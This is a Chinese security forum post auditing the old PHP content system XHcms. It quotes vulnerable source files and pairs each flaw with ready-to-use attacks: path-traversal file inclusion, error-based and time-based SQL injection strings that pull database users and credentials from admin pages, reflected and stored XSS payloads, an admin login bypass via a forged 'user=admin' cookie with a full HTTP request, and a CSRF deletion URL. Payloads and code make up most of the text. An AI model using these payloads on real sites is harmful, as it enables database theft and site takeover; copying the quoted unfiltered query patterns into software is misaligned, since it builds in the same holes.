安全矩阵

 找回密码
 立即注册
搜索
查看: 1323|回复: 0

某cms代码审计

[复制链接]

252

主题

252

帖子

1307

积分

金牌会员

Rank: 6Rank: 6

积分
1307
发表于 2022-7-29 00:08:28 | 显示全部楼层 |阅读模式
本帖最后由 chenqiang 于 2022-7-29 00:09 编辑

原文链接:某cms代码审计


XHcms
目录结构
admin         --管理后台文件夹
css           --存放css的文件夹
files         --存放页面的文件夹
images        --存放图片的文件夹
inc           --存放网站配置文件的文件夹
install       --网站进行安装的文件夹
seacmseditor  --编辑器文件夹
template      --模板文件夹
upload        --上传功能文件夹
index.php     --网站首页

文件包含漏洞
index.php
  1. <?php//单一入口模式error_reporting(0); //关闭错误显示$file = addslashes($_GET['r']); //接收文件名$action = $file == '' ? 'index' : $file; //判断为空或者等于indexinclude('files/' . $action . '.php'); //载入相应文件
复制代码


GET传值r,用函数addslashes转义我们传入的值,防止命令执行、sql注入等,但是这里对文件包含并没有影响
存在目录穿越,可以包含file目录中的也可以包含根目录中的文件
我们在files文件夹下新建一个2.php 根目录新建1.php
  1. <pre><?php phpinfo();</pre>

  2. <pre>payload:?r=2 //包含files文件夹下的phpinfo()?r=../1  //包含根目录的phpinfo()</pre>
复制代码


第二处admin的index.php也是存在同样问题
SQL注入漏洞
  1. <p><code>admin/login.php</code></p>

  2. <pre><?phpob_start();require '../inc/conn.php';$login = $_POST['login'];$user = $_POST['user'];$password = $_POST['password'];$checkbox = $_POST['checkbox'];if ($login <> "") {
  3.     $query = "SELECT * FROM manage WHERE user='$user'";
  4.     echo $query;
  5.     $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  6.     $users = mysql_fetch_array($result);

  7.     if (!mysql_num_rows($result)) {
  8.         echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
  9.         exit;
  10.     } else {
  11.         $passwords = $users['password'];
  12.         if (md5($password) <> $passwords) {
  13.             echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
  14.             exit;
  15.         }//写入登录信息并记住30天
  16.         if ($checkbox == 1) {
  17.             setcookie('user', $user, time() + 3600 * 24 * 30, '/');
  18.         } else {
  19.             setcookie('user', $user, 0, '/');
  20.         }
  21.         echo "<script>this.location='?r=index'</script>";
  22.         exit;
  23.     }
  24.     exit;
  25.     ob_end_flush();}?></pre>
复制代码


没有对参数进行过滤
SQLmap一把梭

手注:

  •         报错注入
  1. ' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ //yong' and updatexml(1,concat(0x7e,(select group_concat() from information_schema.tables where table_schema='www_xh_com' limit 0,1),0x7e),1)--+ //表名' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit 0,1),0x7e),1)--+' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
复制代码


  •         时间盲注
  1. ' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB
复制代码


admin/softlist.php
  1. <?phprequire '../inc/checklogin.php';require '../inc/conn.php';$wzlistopen = 'class="open"';$pageyema = "?r=wzlist&page=";$delete = $_GET['delete'];if ($delete <> "") {
  2.     $query = "DELETE FROM download WHERE id='$delete'";
  3.     $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  4.     echo "<script>alert('亲,ID为" . $delete . "的内容已经成功删除!');location.href='?r=softlist'</script>";
  5.     exit;}?>
复制代码


无过滤,开启了mysql错误回显,直接报错注入
  1. http://www.xh.com/admin/?r=softlist&delete=' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
复制代码


执行结果:
  1. <pre>SQL语句有误:XPATH syntax error: '~xh@localhost~'</pre>
复制代码


admin/editlink.php
  1. <?phprequire '../inc/checklogin.php';require '../inc/conn.php';$linklistopen = 'class="open"';$id = $_GET['id'];$query = "SELECT * FROM link WHERE id='$id'";echo $query;$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());$link = mysql_fetch_array($resul);
复制代码



无过滤,报错注入,时间盲注
  1. ' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
复制代码


admin/editcolumn.php
  1. <?phprequire '../inc/checklogin.php';require '../inc/conn.php';$columnopen = 'class="open"';$id = $_GET['id'];$type = $_GET['type'];if ($type == 1) {
  2.     $query = "SELECT * FROM nav WHERE id='$id'";
  3.     echo $query;
  4.     $resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  5.     $nav = mysql_fetch_array($resul);}if ($type == 2) {
  6.     $query = "SELECT * FROM navclass WHERE id='$id'";
  7.     $resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  8.     $nav = mysql_fetch_array($resul);}
复制代码


无过滤,报错注入,时间盲注
  1. ' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
复制代码


admin/editsoft.php
  1. <?phprequire '../inc/checklogin.php';require '../inc/conn.php';$wzlistopen='class="open"';$id=$_GET['id'];$query = "SELECT * FROM download WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());$download = mysql_fetch_array($resul);
复制代码


无过滤,报错注入,时间盲注
  1. ' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
复制代码


admin/columnlist.php
  1. <?phprequire '../inc/checklogin.php';require '../inc/conn.php';$columnlistopen = 'class="open"';$delete = $_GET['delete'];$delete2 = $_GET['delete2'];if ($delete <> "") {
  2.     $query = "DELETE FROM nav WHERE id='$delete'";
  3.     $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  4.     echo "<script>alert('亲,ID为" . $delete . "的栏目已经成功删除!');location.href='?r=columnlist'</script>";
  5.     exit;}if ($delete2 <> "") {
  6.     $query = "DELETE FROM navclass WHERE id='$delete2'";
  7.     $result = mysql_query($query) or die('SQL语句有误:' . mysql_error());
  8.     echo "<script>alert('亲,ID为" . $delete2 . "的二级栏目已经成功删除!');location.href='?r=columnlist'</script>";
  9.     exit;}?>
复制代码


无过滤,开启mysql错误显示,时间盲注,报错注入,布尔盲注
  1. ' AND (SELECT 4931 FROM (SELECT(SLEEP(5)))PEws)-- QzwB' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
复制代码


这样类似的漏洞还有很多,毕竟这个cms很老了,而且还是一个人开发的
前台
file/software.php
  1. <?phprequire 'inc/conn.php';require 'inc/time.class.php';$query = "SELECT * FROM settings";$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());$info = mysql_fetch_array($resul);$id = addslashes($_GET['cid']);$query = "SELECT * FROM download WHERE id='$id'";$resul = mysql_query($query) or die('SQL语句有误:' . mysql_error());$download = mysql_fetch_array($resul);//浏览计数$query = "UPDATE download SET hit = hit+1 WHERE id=$id";echo $query;@mysql_query($query) or die('修改错误:' . mysql_error());?>
复制代码


直接将值带入到sql语句中,就不需要闭合,也就不会触发addslashes函数
XSS漏洞
反射性
file/contact.php
  1. $page = addslashes($_GET['page']);if ($page <> "") {    if ($page <> 1) {        
  2. $pages = "第" . $page . "页 - ";    }}<?php echo $page ?>
复制代码


addslashes函数对js标签并不过滤
  1. http://www.xh.com/?r=contact&page=<script>alert(1)</script>http://www.xh.com/?r=contact&page=<img src=1 onerror=alert(/xss/)>
复制代码


存储型
admin/file/mangeinfo.php
  1. $save=$_POST['save'];$user=$_POST['user'];$name=$_POST['name'];$password=$_POST['password'];$password2=$_POST['password2'];$img=$_POST['img'];$mail=$_POST['mail'];$qq=$_POST['qq'];if ($save==1){if ($user==""){echo "<script>alert('抱歉,帐号不能为空。');history.back()</script>";exit;    }if ($name==""){echo "<script>alert('抱歉,名称不能为空。');history.back()</script>";exit;    }if ($password<>$password2){echo "<script>alert('抱歉,两次密码输入不一致!');history.back()</script>";exit;    }//处理图片上传if(!empty($_FILES['images']['tmp_name'])){$query = "SELECT * FROM imageset";$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());$imageset = mysql_fetch_array($result);include '../inc/up.class.php';if (empty($HTTP_POST_FILES['images']['tmp_name']))//判断接收数据是否为空{        $tmp = new FileUpload_Single;        $upload="../upload/touxiang";//图片上传的目录,这里是当前目录下的upload目录,可自已修改        $tmp -> accessPath =$upload;        if ( $tmp -> TODO() )        {            $filename=$tmp -> newFileName;//生成的文件名            $filename=$upload.'/'.$filename;            $imgsms="及图片";        }       }}if ($filename<>""){$images="img='$filename',"; }if ($password<>""){$password=md5($password);$password="password='$password',";}$query = "UPDATE manage SET user='$user',name='$name',$password$imagesmail='$mail',qq='$qq',date=now()";@mysql_query($query) or die('修改错误:'.mysql_error());echo "<script>alert('亲爱的,资料".$imgsms."设置已成功更新!');location.href='?r=manageinfo'</script>"; exit;}?>
复制代码


POST传参,但是无任何过滤,直接根数据库进行交互,存在存储型XSS
payload:
  1. <img src=1 onerror=alert(/xss/)>
复制代码


垂直越权
inc/checklogin.php
  1. <?php$user=$_COOKIE['user'];if ($user==""){header("Location: ?r=login");exit;   }?>
复制代码

  1. POST /admin/?r=login HTTP/1.1Host: www.xh.comContent-Length: 25Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://www.xh.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xh.com/admin/?r=loginAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=moiv7ip0kf500du1luv2ccr333; name=dasd; mail=dasd;user=adminConnection: closeuser=&password=&login=yes
复制代码


在cookie中添加一个新的属性:user=admin
CSRF漏洞
/admin/files/wzlist.php
  1. $delete=$_GET['delete'];if ($delete<>""){$query = "DELETE FROM content WHERE id='$delete'";$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());echo "<script>alert('亲,ID为".$delete."的内容已经成功删除!');location.href='?r=wzlist'</script>";exit;
复制代码


在内容管理→文章列表删除文章,点击删除抓包,得到url:
www.xh.com/admin/?r=wzlist&delete=18
抓包,在cookie处,添加一个新的属性:user=admin,更改delete的值就可以实现csrf


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 19:47 , Processed in 0.014352 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表